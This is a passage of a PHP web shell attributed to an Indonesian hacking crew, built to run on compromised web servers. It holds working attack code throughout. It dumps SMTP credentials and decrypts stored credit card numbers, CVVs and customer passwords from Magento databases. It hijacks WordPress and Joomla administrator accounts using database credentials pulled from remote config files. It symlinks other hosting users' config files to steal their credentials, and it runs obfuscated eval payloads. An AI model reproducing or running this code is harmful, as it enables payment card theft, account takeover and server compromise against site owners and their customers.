  716.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
  717.     if(mysql_num_rows($query_smtp) != 0){  
  718.         if (!$query_smtp){  
  719.               echo "<center><b>Gagal</b></center>";  
  720.         }else{  
  721.               echo'<br><br>  
  722.                     ====================================================================<br>  
  723.                                     [ SMTP ] <br>  
  724.                     ====================================================================<br>';  
  725.         }  
  726.         echo "  
  727.         <table border='1' align='center' >  
  728.         <tr>  
  729.         <td>no</td>  
  730.         <td>host</td>          
  731.         <td>port</td>  
  732.         <td>user</td>  
  733.         <td>pass</td>      
  734.         </tr>";  
  735.             $no = 1;  
  736.             $batas = 0;  
  737.             while($rows = mysql_fetch_array($query_smtp)) {  
  738.                 $smtphost = $rows[0];  
  739.                 $smtpport = $rows[1];  
  740.                 $smtpuser = $rows[2];  
  741.                 $smtppass = $rows[3];  
  742.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
  743.                 $no++;  
  744.             }  
  745.         echo "</table><br>";  
  746.     }  
  747.     //=========================================================================================================  
  748.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
  749.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  750.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
  751.           echo'<br><br>  
  752.                 ====================================================================<br>  
  753.                                 [ Credit Card ] <br>  
  754.                 ====================================================================<br>';  
  755.             echo "  
  756.             <table border='1' align='left' >  
  757.             <tr>  
  758.             <td>no</td>  
  759.             <td>Date</td>  
  760.             <td>Credit Owner</td>  
  761.             <td>method</td>  
  762.             <td>Credit Number</td>  
  763.             <td>Credit Exp</td>  
  764.             <td>CVV</td>  
  765.             <td>Address</td>  
  766.             </tr>";  
  767.                 $no = 1;  
  768.                 $batas = 0;  
  769.                 while($vx = mysql_fetch_array($query)){  
  770.                 $date = $vx['updated_at'];  
  771.                 $cc_owner = $vx['cc_owner'];  
  772.                 $method = $vx['method'];  
  773.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
  774.                 $exp = $vx['exp'];          
  775.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
  776.                 $Billing_Address = $vx['Billing Address'];  
  777.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
  778.                 $batas = $no++;  
  779.                 }  
  780.                  
  781.                 while($vx2 = mysql_fetch_array($query2)){  
  782.                     $batas +=1;  
  783.                 $cc_owner = $vx2['cc_owner'];  
  784.                 $method = $vx2['method'];  
  785.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
  786.                 $exp = $vx2['exp'];          
  787.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
  788.                 $Billing_Address = $vx2['Billing Address'];  
  789.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
  790.                  $batas++;  
  791.                 }      
  792.                  
  793.             echo "</table><br>";      
  794.     }  
  795.     //=========================================================================================================  
  796.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
  797.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
  798.      
  799.      
  800.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
  801.         if (!$query){  
  802.               echo "<center><b>Gagal</b></center>";  
  803.         }else{  
  804.               echo'<br><br>  
  805.                     ====================================================================<br>  
  806.                                     [ Customer ] <br>  
  807.                     ====================================================================<br>';  
  808.         }  
  809.         echo "  
  810.         <table border='1' align='center' >  
  811.         <tr>  
  812.         <td>no</td>  
  813.         <td>user</td>  
  814.         <td>pass</td>      
  815.         </tr>";  
  816.             $no = 1;  
  817.             $batas = 0;  
  818.             while($vx = mysql_fetch_array($query)) {  
  819.                 $user = $vx['email'];  
  820.                 $pass = $vx['value'];  
  821.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  822.                 $batas = $no++;  
  823.             }  
  824.              
  825.             if(mysql_num_rows($query2) != 0 && ($query2)){  
  826.                 while($vx2 = mysql_fetch_array($query2)){  
  827.                     $user = $vx2['customer_email'];  
  828.                     $pass = $crypto->decrypt($vx2['password_hash']);  
  829.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
  830.                         $batas +=1;  
  831.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
  832.                         $batas++;  
  833.                     }  
  834.                 }                  
  835.             }  
  836.          
  837.         echo "</table><br>";  
  838.     }  
  839.     //=========================================================================================================  
  840.   }  
  841. }  
  842. function save($format,$data){  
  843.     $fp = fopen($format, 'a');  
  844.     fwrite($fp, $data);  
  845.     fclose($fp);  
  846. }  
  847. function cekbase64($string){  
  848.         $decoded = base64_decode($string, true);  
  849.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
  850.         if(!base64_decode($string, true)) return false;  
  851.         if(base64_encode($decoded) != $string) return false;  
  852.         return true;//nilai return 1 jika true  
  853.     }  
  854. //----untuk decode password ---/  
  855. class Varien_Crypt_Mcrypt{  
  856.     /**  
  857.      * Constuctor  
  858.      *  
  859.      * @param array $data  
  860.      */  
  861.     public function __construct()  
  862.     {  
  863.     }  
  864.  
  865.     /**  
  866.      * Initialize mcrypt module  
  867.      *  
  868.      * @param string $key cipher private key  
  869.      * @return Varien_Crypt_Mcrypt  
  870.      */  
  871.     public function init($key)  
  872.     {  
  873.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
  874.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
  875.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
  876.  
  877.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
  878.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
  879.             return null;  
  880.         }  
  881.  
  882.         mcrypt_generic_init($this->handler, $key, $iv);  
  883.  
  884.         return $this;  
  885.     }  
  886.  
  887.     /**  
  888.      * Encrypt data  
  889.      *  
  890.      * @param string $data source string  
  891.      * @return string  
  892.      */  
  893.     public function encrypt($data)  
  894.     {  
  895.         if (!$this->handler) {  
  896.             //throw new Varien_Exception('Crypt module is not initialized.');  
  897.             return null;  
  898.         }  
  899.         if (strlen($data) == 0) {  
  900.             return $data;  
  901.         }  
  902.         return base64_encode(mcrypt_generic($this->handler, $data));  
  903.     }  
  904.  
  905.     /**  
  906.      * Decrypt data  
  907.      *  
  908.      * @param string $data encrypted string  
  909.      * @return string  
  910.      */  
  911.     public function decrypt($data)  
  912.     {  
  913.         if (!$this->handler) {  
  914.             //throw new Varien_Exception('Crypt module is not initialized.');  
  915.             return null;  
  916.         }  
  917.         if (strlen($data) == 0) {  
  918.             return $data;  
  919.         }  
  920.         return mdecrypt_generic($this->handler, base64_decode($data));  
  921.     }  
  922.          
  923.    
  924.     /**  
  925.      * Desctruct cipher module  
  926.      *  
  927.      */  
  928.     public function __destruct()  
  929.     {  
  930.         if ($this->handler) {  
  931.             $this->_reset();  
  932.         }  
  933.     }  
  934.  
  935.     protected function _reset()  
  936.     {  
  937.         mcrypt_generic_deinit($this->handler);  
  938.         mcrypt_module_close($this->handler);  
  939.     }  
  940. }  
  941. }
  942. elseif($_GET['do'] == 'zip') {
  943.     echo "<center><h1>Zip Menu</h1>";
  944. function rmdir_recursive($dir) {
  945.     foreach(scandir($dir) as $file) {
  946.        if ('.' === $file || '..' === $file) continue;
  947.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  948.        else unlink("$dir/$file");
  949.    }
  950.    rmdir($dir);
  951. }
  952. if($_FILES["zip_file"]["name"]) {
  953.     $filename = $_FILES["zip_file"]["name"];
  954.     $source = $_FILES["zip_file"]["tmp_name"];
  955.     $type = $_FILES["zip_file"]["type"];
  956.     $name = explode(".", $filename);
  957.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  958.     foreach($accepted_types as $mime_type) {
  959.         if($mime_type == $type) {
  960.             $okay = true;
  961.             break;
  962.         }
  963.     }
  964.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  965.     if(!$continue) {
  966.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  967.     }
  968.   $path = dirname(__FILE__).'/';
  969.   $filenoext = basename ($filename, '.zip');
  970.   $filenoext = basename ($filenoext, '.ZIP');
  971.   $targetdir = $path . $filenoext;
  972.   $targetzip = $path . $filename;
  973.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  974.   mkdir($targetdir, 0777);
  975.     if(move_uploaded_file($source, $targetzip)) {
  976.         $zip = new ZipArchive();
  977.         $x = $zip->open($targetzip);
  978.         if ($x === true) {
  979.             $zip->extractTo($targetdir);
  980.             $zip->close();
  981.  
  982.             unlink($targetzip);
  983.         }
  984.         $message = "<b>Sukses Gan :)</b>";
  985.     } else {   
  986.         $message = "<b>Error Gan :(</b>";
  987.     }
  988. }  
  989. echo '<table style="width:100%" border="1">
  990.   <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  991. <label>Zip File : <input type="file" name="zip_file" /></label>
  992. <input type="submit" name="submit" value="Upload And Unzip" />
  993. </form>';
  994. if($message) echo "<p>$message</p>";
  995. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  996.     if($_POST['backup']){
  997.     $save=$_POST['save'];
  998.     function Zip($source, $destination)
  999. {
  1000.     if (extension_loaded('zip') === true)
  1001.     {
  1002.         if (file_exists($source) === true)
  1003.         {
  1004.             $zip = new ZipArchive();
  1005.  
  1006.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1007.             {
  1008.                 $source = realpath($source);
  1009.  
  1010.                 if (is_dir($source) === true)
  1011.                 {
  1012.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1013.  
  1014.                     foreach ($files as $file)
  1015.                     {
  1016.                         $file = realpath($file);
  1017.  
  1018.                         if (is_dir($file) === true)
  1019.                         {
  1020.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1021.                         }
  1022.  
  1023.                         else if (is_file($file) === true)
  1024.                         {
  1025.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1026.                         }
  1027.                     }
  1028.                 }
  1029.  
  1030.                 else if (is_file($source) === true)
  1031.                 {
  1032.                     $zip->addFromString(basename($source), file_get_contents($source));
  1033.                 }
  1034.             }
  1035.  
  1036.             return $zip->close();
  1037.         }
  1038.     }
  1039.  
  1040.     return false;
  1041. }
  1042.     Zip($_POST['dir'],$save);
  1043.     echo "Done , Save To <b>$save</b>";
  1044.     }
  1045.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1046.     if($_POST['extrak']){
  1047.     $save=$_POST['save'];
  1048.     $zip = new ZipArchive;
  1049.     $res = $zip->open($_POST['dir']);
  1050.     if ($res === TRUE) {
  1051.         $zip->extractTo($save);
  1052.         $zip->close();
  1053.     echo 'Succes , Location : <b>'.$save.'</b>';
  1054.     } else {
  1055.     echo 'Gagal Mas :( Ntahlah !';
  1056.     }
  1057.     }
  1058. echo '</tr></table>';  
  1059.     }
  1060.     elseif($_GET['do'] == 'shellchk') {
  1061.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH2v1P9gLKQGqXjLJh4GesRA7bSXVmd1Dyuosi37pkO5yQ3JYyb++67zUgrjbi9RrW8759x7rn18Mc4k49MYBaAO+712KmjBhC1jacNGXcRFgFqSG855DLkUtFfjAiGTCY2VNGPDPQ/wHqxTy5SzMXPSJagJkAGo0/E41sd3tGbywSgJo0sWcJOhZiOVKQpKp4u0o1YsnZkdH58wLe91MAmn4yZpON3p6p8LFQGLnTWGiCba7UAQF7YKq2yRw2bgUjPfSxf5hXjisVjpKB+F9yWH/KzfWCNEFskeENZe+U0jCRYG17FZMDiEDFbkEfvT7zFtDjO0R6Zus4pEzU3YTI0yYCHyINJyQAcNejW5HbLPUPapUioCKaspH/Ffxcl1swmA98psNYPTwZAoq4FfH9zuwXzhBC3HlKb+lKcsddXM2MfJpC2lcWFlk4PUnrheLOfflvMVny9/XXxdrr9fXc0XvAlHon9UVuQIy8ujPHK1XMa7oJ1Ztq8xXYgXaICFgnpb8J4q/5wXNmoB18aByzdrLiNjRT5tI/FurXFLJTvqhH7qCLnTOWA094IboSPG+709tXZTn0apQwQ8syZqI7gHysAt78Zay2ABwYfPgYeMztYRs1056mWwunWEkeIhpHgmwFtd6tm1UxThDxmJxHtEAEyyhrEPeXdMpjEl02US3JHu7WE1+WG23jkrHsMX36fj8r6wZNiU+MTQGXxugpMXJmtbJ3KJ6yw1nbJrPvvpm4ewji1DYkOzpdbkooP3qHPPv/99xsYWynPvZMgak/CLBPYex9zv0c8fZmEMT2O4vrxLfF0Nqi5VjaLTv6g9mEFY8XtS1dYEytC2lZpDNkPPsE3betDUQR0UepyRsaqI1kex95xIGq/sbgfUEPjrWP5T1+Ulif/jb9evbdfLWnX2foEOjc3bLfab8/QX'))))));
  1062.     } elseif($_GET['do'] == 'loghunter')
  1063.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
  1064. elseif($_GET['do'] == 'metu') {
  1065.    
  1066.  
  1067. echo '<form action="?dir=$dir&do=metu" method="post">';
  1068.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1069.     echo 'Byee !';
  1070.    
  1071. }
  1072. elseif($_GET['do'] == 'about') {
  1073.    
  1074.     echo '<center>Achon666ju5t - Extreme Crew';
  1075.    
  1076. }
  1077. elseif($_GET['do'] == 'auto_cu_wp') {
  1078. if($_POST['gass']) {
  1079.     echo "<center><h1>WordPress Auto Change User 2</h1>
  1080.         <form method='post'>
  1081.         Link Config: <br>
  1082.         <textarea name='link' style='width: 450px; height:250px;'>";
  1083.     UrlLoop($_POST['linkconf'],'wordpress');   
  1084.     echo"</textarea><br>
  1085.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1086.         </form></center>";
  1087. }   else {
  1088.         echo "<center><h1>WordPress Auto Change User 2</h1>
  1089.         <form method='post'>
  1090.         Link Config: <br>
  1091.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/chonx_symconf/'><br>
  1092.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1093.         </form></center>";
  1094.     }
  1095. if($_POST['auto_cu_wp']) {
  1096.    
  1097.         function anucurl($sites) {
  1098.             $ch = curl_init($sites);
  1099.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1100.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1101.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1102.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1103.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1104.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1105.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1106.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1107.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1108.             $data = curl_exec($ch);
  1109.                   curl_close($ch);
  1110.             return $data;
  1111.         }
  1112.         $link = explode("\r\n", $_POST['link']);
  1113.         $user = "achonx";
  1114.         $pass = "achonx";
  1115.         $passx = md5($pass);
  1116.         foreach($link as $dir_config) {
  1117.             $config = anucurl($dir_config);
  1118.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1119.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1120.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1121.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1122.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1123.             $prefix = $dbprefix."users";
  1124.             $option = $dbprefix."options";
  1125.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1126.             $db = mysql_select_db($dbname);
  1127.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1128.             $result = mysql_fetch_array($q);
  1129.             $id = $result[ID];
  1130.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1131.             $result2 = mysql_fetch_array($q2);
  1132.             $target = $result2[option_value];
  1133.             if($target == '') {                
  1134.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1135.             } else {
  1136.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1137.             }
  1138.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1139.             if(!$conn OR !$db OR !$update) {
  1140.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1141.                 mysql_close($conn);
  1142.             } else {
  1143.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1144.                     echo "[+] username: <font color=lime>$user</font><br>";
  1145.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1146.                    
  1147.                 mysql_close($conn);
  1148.             }
  1149.         }
  1150.     }  
  1151.  
  1152. }
  1153. elseif($_GET['do'] == 'auto_cu_joomla') {
  1154. if($_POST['gass']) {
  1155.     echo "<center><h1>Joomla Auto Change User 2</h1>
  1156.         <form method='post'>
  1157.         Link Config: <br>
  1158.         <textarea name='link' style='width: 450px; height:250px;'>";
  1159.     UrlLoop($_POST['linkconf'],'joomla');  
  1160.     echo"</textarea><br>
  1161.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1162.         </form></center>";
  1163. }   else {
  1164.         echo "<center><h1>Joomla Auto Change User 2</h1>
  1165.         <form method='post'>
  1166.         Link Config: <br>
  1167.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/chonx_symconf/'><br>
  1168.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1169.         </form></center>";
  1170.     }
  1171. if($_POST['auto_cu_joomla']) {
  1172.    
  1173.         function anucurl($sites) {
  1174.             $ch = curl_init($sites);
  1175.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1176.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1177.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1178.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1179.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1180.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1181.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1182.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1183.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1184.             $data = curl_exec($ch);
  1185.                   curl_close($ch);
  1186.             return $data;
  1187.         }
  1188.         $link = explode("\r\n", $_POST['link']);
  1189.         $user = "achonx";
  1190.         $pass = "achonx";
  1191.         $passx = md5($pass);
  1192.         foreach($link as $dir_config) {
  1193.             $config = anucurl($dir_config);
  1194.                     $dbhost = ambilkata($config,"host = '","'");
  1195.                     $dbuser = ambilkata($config,"user = '","'");
  1196.                     $dbpass = ambilkata($config,"password = '","'");
  1197.                     $dbname = ambilkata($config,"db = '","'");
  1198.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1199.                     $prefix = $dbprefix."users";
  1200.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1201.                     $db = mysql_select_db($dbname);
  1202.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1203.                     $result = mysql_fetch_array($q);
  1204.                     $id = $result['id'];
  1205.                     $site = ambilkata($config,"sitename = '","'");
  1206.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1207.                     echo "Config => ".$dir_config."<br>";
  1208.                     echo "CMS => Joomla<br>";
  1209.                     if($site == '') {
  1210.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1211.                     } else {
  1212.                         echo "Sitename => $site<br>";
  1213.                     }
  1214.                     if(!$update OR !$conn OR !$db) {
  1215.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1216.                     } else {
  1217.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1218.                     }
  1219.                     mysql_close($conn);
  1220.                     }
  1221.     }  
  1222. }
  1223. elseif($_GET['do'] == 'symconfig') {
  1224. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1225. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1226. exit;
  1227. }
  1228. else
  1229. {
  1230. if($_POST["m"] && !$_POST["passwd"]==""){
  1231. @mkdir("chonx_symconf", 0777);
  1232. @chdir("chonx_symconf");
  1233. @symlink("/","root");
  1234. $htaccess="Options Indexes FollowSymLinks
  1235. DirectoryIndex janchonx.htm
  1236. AddType text/plain .php
  1237. AddHandler text/plain .php
  1238. Satisfy Any";
  1239. @file_put_contents(".htaccess",$htaccess);
  1240. $etc_passwd=$_POST["passwd"];
  1241. $etc_passwd=explode("\n",$etc_passwd);
  1242. foreach($etc_passwd as $passwd){
  1243. $pawd=explode(":",$passwd);
  1244. $user =$pawd[0];
  1245.  
  1246. @symlink('/','chonx_symconf/root');
  1247. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1248. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1249. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1250. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1251. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1252. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1253. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1254. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1255. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1256. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1257. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1258. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1259. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1260. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1261. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1262. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1263. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1264. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1265. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1266. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1267. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1268. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1269. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1270. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1276. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1277. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1278. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
